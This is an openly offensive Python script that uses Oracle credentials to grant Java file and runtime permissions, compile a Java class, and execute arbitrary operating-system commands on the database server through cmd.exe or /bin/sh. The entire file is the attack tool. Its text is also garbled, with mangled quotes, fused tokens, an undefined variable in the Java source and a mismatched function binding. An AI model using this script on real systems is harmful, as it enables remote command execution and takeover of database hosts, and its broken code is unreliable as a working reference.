#!/usr/bin/env python
#-*- coding: utf-8 -*-# File: ora_exec_cmd.py
# Author: Persuit
import getopt
import sys
import cx_Oracle
def usage():
print(‘Usage: python %s [options]‘ % sys.argv[0])
print(‘‘)
print(‘Options:‘)
print(‘-h HOST, --host=HOST target server address‘)
print(‘-u USER, --user=USER Username‘)
print(‘-p PASS, --pass=PASS Password‘)
print(‘-s SID, --sid=SID Target Sid Name‘)
print(‘-P PORT, --port=PORT Oracle Port‘)
#print(‘-b BYPASS, --bypass=BYPASS Bypass Creation Of Evil Functions‘)
print(‘-c COMMAND, --command=COMMAND COMMAND‘)
def connectDB(host= ‘‘,user = ‘‘,passwd = ‘‘,sid = ‘‘,port = 1521):try:
connstr= ‘%s/%s@%s:%d/%s‘ % (user,passwd,host,int(port),sid)
conn=cx_Oracle.connect(connstr)
except cx_Oracle.DatabaseErrorase:
print str(e)
sys.exit(-1)returnconn
def main():try:
opts, args= getopt.getopt(sys.argv[1:], ‘h:u:p:s:P:c:‘, [‘host=‘, ‘user=‘, ‘passwd=‘, ‘sid=‘, ‘port=‘, ‘command=‘])
except getopt.GetoptErrorase:
print(‘[-] %s‘ %(str(e)))
usage()
sys.exit(2)
host= ‘‘user= ‘‘passwd= ‘‘sid= ‘‘port= 1521command= ‘‘
for o, a inopts:if o in (‘-h‘, ‘--host‘):
host=a
elif oin (‘-u‘,‘--user‘):
user=a
elif oin (‘-p‘,‘--passwd‘):
passwd=a
elif oin (‘-s‘,‘--sid‘):
sid=a
elif oin (‘-P‘,‘--port‘):
port=a
elif oin (‘-c‘,‘--command‘):
command=aelse:
passifnot host:
print (‘[!] host not be empty !‘)
usage()
sys.exit(2)
elif not user:
print (‘[!] username not be empty!‘)
usage()
sys.exit(2)
elif not passwd:
print (‘[!] password not be empty!‘)
usage()
sys.exit(2)
elif not sid:
print (‘[!] sid not be empty!‘)
usage()
sys.exit(2)
elif not command:
print (‘[!] command not be empty!‘)
usage()
sys.exit(2)
#conn= connectDB(‘127.0.0.1‘,‘Oracle‘,‘123456‘,‘sdfsdf‘,‘dbtest‘,1521)
conn=connectDB(host,user,passwd,sid,port)
cursor=conn.cursor()
print ("[-] Setting permissions...\n")
setpermission= ‘‘‘BEGIN
dbms_java.grant_Permission(‘{0}‘, ‘java.io.FilePermission‘, ‘<>‘, ‘read ,write, execute, delete‘);
dbms_java.grant_Permission(‘{0}‘, ‘SYS:java.lang.RuntimePermission‘, ‘writeFileDescriptor‘, ‘‘);
dbms_java.grant_Permission(‘{0}‘, ‘SYS:java.lang.RuntimePermission‘, ‘readFileDescriptor‘, ‘‘);
END;‘‘‘.format(user.upper())
cursor.execute(setpermission)
#conn.commit()
print ("[-] Creating Java class...\n")
createjava= ‘‘‘create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String run_cmd(String args) {try {String[] fCmd;if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {fCmd = new String[3];fCmd[0] = "C:\\\\windows\\\\system32\\\\cmd.exe";fCmd[1] = "/c";fCmd[2] = command;}else {fCmd = new String[3];fCmd[0] = "/bin/sh";fCmd[1] = "-c";fCmd[2] = command;}final Process pr = Runtime.getRuntime().exec(fCmd);pr.waitFor();new Thread(new Runnable(){public void run() {BufferedReader br_in = null;try {br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));String buff = null;while ((buff = br_in.readLine()) != null) {System.out.println(buff);try {Thread.sleep(100); } catch(Exception e) {}}br_in.close();}catch (IOException ioe) {System.out.println("Exception caught printing process output.");ioe.printStackTrace();}finally { try { br_in.close(); } catch (Exception ex) {} }}}).start();new Thread(new Runnable(){public void run() {BufferedReader br_err = null;try {br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));String buff = null;while ((buff = br_err.readLine()) != null) {System.out.println("Error: " + buff);try {Thread.sleep(100); } catch(Exception e) {}}br_err.close();}catch (IOException ioe) {System.out.println("Exception caught printing process error.");ioe.printStackTrace();}finally { try { br_err.close(); } catch (Exception ex) {} }}}).start();}catch (Exception ex){System.out.println(ex.getLocalizedMessage());}}};‘‘‘cursor.execute(createjava)
print ("[-] Creating function...\n")
creatfunc= ‘‘‘create or replace function run_cmd( p_cmd in varchar2) return number as language java name‘Util.runthis(java.lang.String) return integer‘;‘‘‘cursor.execute(creatfunc)
print ("[-] Creating procedure...\n")
creatproc= ‘‘‘create or replace procedure rc(p_cmd in varchar2) as x number; begin x := run_cmd(p_cmd);end;‘‘‘cursor.execute(creatproc)
print ("[-] Exec cmd...\n")
cmd= ‘‘‘DECLARE
l_output DBMS_OUTPUT.chararr;
l_lines INTEGER := 1000;
begin
DBMS_OUTPUT.enable(1000000);
DBMS_JAVA.SET_OUTPUT(1000000);
rc(‘{0}‘);
DBMS_OUTPUT.get_lines(l_output, l_lines);
FOR i IN1.. l_lines LOOP
DBMS_OUTPUT.put_line(l_output(i));
NULL;
END LOOP;
end;‘‘‘.format(command)
cursor.execute(cmd)
print ("[-] Drop function...\n")
dropfunc= ‘‘‘BEGIN
drop function run_cmd;
END;‘‘‘cursor.execute(dropfunc)
cursor.close()
conn.close()if __name__ == ‘__main__‘:
main()